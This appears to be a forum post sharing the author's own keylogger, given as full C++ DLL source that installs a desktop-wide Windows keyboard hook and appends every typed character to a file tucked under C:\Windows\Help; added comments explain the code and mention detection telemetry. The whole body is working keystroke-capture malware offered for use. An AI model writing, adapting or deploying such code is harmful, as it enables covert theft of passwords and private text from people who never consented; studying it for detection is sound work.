【2022.8.22】自己写的一款很简单的键盘记录器,已去掉获取窗口标题部分逻辑,用的KeyboardProc回调,基本都是提供好的接口
// Crack.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
HINSTANCE hin; // Module handle: the base address of this module in memory. Set in DllMain and passed to SetWindowsHookEx in Install().
// DLL entry point. Records the module handle in the global `hin` and does no
// other work for any of the four notification reasons.
// Returns TRUE unconditionally.
BOOL APIENTRY DllMain(HMODULE hModule, // entry function
DWORD ul_reason_for_call,
LPVOID lpReserved)
{
// Runs on every notification (process/thread attach and detach), not only on
// DLL_PROCESS_ATTACH, because the assignment sits before the switch.
hin = hModule;
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
// Exported function: install the hook.
//
// Registers KeyboardProc as a WH_KEYBOARD hook, passing this DLL's module handle
// and thread id 0. With thread id 0 the hook is not limited to one thread; it
// applies to all threads on the caller's desktop.
// The hook handle is stored in g_hHook. g_hHook and the KeyboardProc prototype
// are not declared in the visible source; presumably they come from pch.h.
//
// Returns false if SetWindowsHookEx returned NULL, true otherwise. The result is
// only evaluated after the one-week Sleep below has elapsed.
//
// Defensive note: a desktop-wide WH_KEYBOARD hook backed by a DLL is the classic
// hook-based keystroke-capture pattern (MITRE ATT&CK T1056.001). Useful
// telemetry is the SetWindowsHookEx call with WH_KEYBOARD and thread id 0, and
// the same DLL appearing in unrelated GUI processes.
extern "C" __declspec(dllexport) BOOL Install() {
g_hHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, hin, 0);
Sleep(1000 * 60 * 60 * 24 * 7); // one week (604,800,000 ms); the calling thread blocks here
if (g_hHook == NULL)
return false;
return true;
}
// Exported function: uninstall the hook.
// Passes the handle stored in g_hHook to UnhookWindowsHookEx and returns its
// result unchanged (non-zero on success).
extern "C" __declspec(dllexport) BOOL Remove() {
return UnhookWindowsHookEx(g_hHook);
}
// Hook procedure: keyboard callback. The parameters are the hook code (nCode),
// the virtual-key code (wParam), and the keystroke flags (lParam), which carry
// the scan code and the key-transition bit.
//
// On each invocation it opens the log file, translates the key to characters
// with ToAscii, appends the text on key-down, closes the file, and forwards the
// event with CallNextHookEx. nCode is not inspected here; it is only forwarded.
//
// Defensive note: the fixed output path below is a host artifact to look for.
// The per-keystroke open/append/close cycle, issued from whichever process is
// running the hook, shows up in file-system telemetry.
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
// Open the log file (created if missing; other processes may read it meanwhile)
HANDLE pFile = CreateFile("C:\\Windows\\Help\\Help\\Key\\key.txt", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
DWORD dwHigh;
DWORD dwPos = GetFileSize(pFile, &dwHigh); // move the file pointer to the current end so writes append
// Only the low 32 bits of the size are used for the seek. Both calls run before
// the handle is validated below.
SetFilePointer(pFile, dwPos, 0, FILE_BEGIN);
if (pFile == INVALID_HANDLE_VALUE) { // file open failed
CloseHandle(pFile);
return CallNextHookEx(g_hHook, nCode, wParam, lParam);
}
// Character handling
char szText[MAX_PATH]; // text to be written for this event
char szKeyState[256] = { 0 }; // one state byte per virtual key, filled by GetKeyboardState
char szAscii[4] = { 0 }; // receives the translated character(s) from ToAscii
DWORD writeBytes;
int enter;
GetKeyboardState((PBYTE ) szKeyState);
char type = GetKeyState(VK_SHIFT); // check whether Shift is pressed
szKeyState[VK_SHIFT] = type; // overwrite the Shift entry with the value just read
int code = lParam;
code = code >> 16; // drop the repeat count; the scan code is in the low bits of what remains
int i = ToAscii(wParam, code, (const BYTE *) szKeyState, (LPWORD) szAscii, 0);
szAscii[i] = 0; // terminate after the number of characters ToAscii reported
if ((lParam & 0x80000000) == 0) { // bit 31 clear: the key is being pressed (not released)
enter = GetKeyState(VK_RETURN); // check whether Enter is pressed
if (enter < 0) {
// Enter is down: record a line break instead of the translated character
wsprintf(szText, "\r\n");
}
else {
wsprintf(szText, "%s", szAscii);
}
WriteFile(pFile, szText, strlen(szText), &writeBytes, NULL);
}
CloseHandle(pFile);
return CallNextHookEx(g_hHook, nCode, wParam, lParam);
}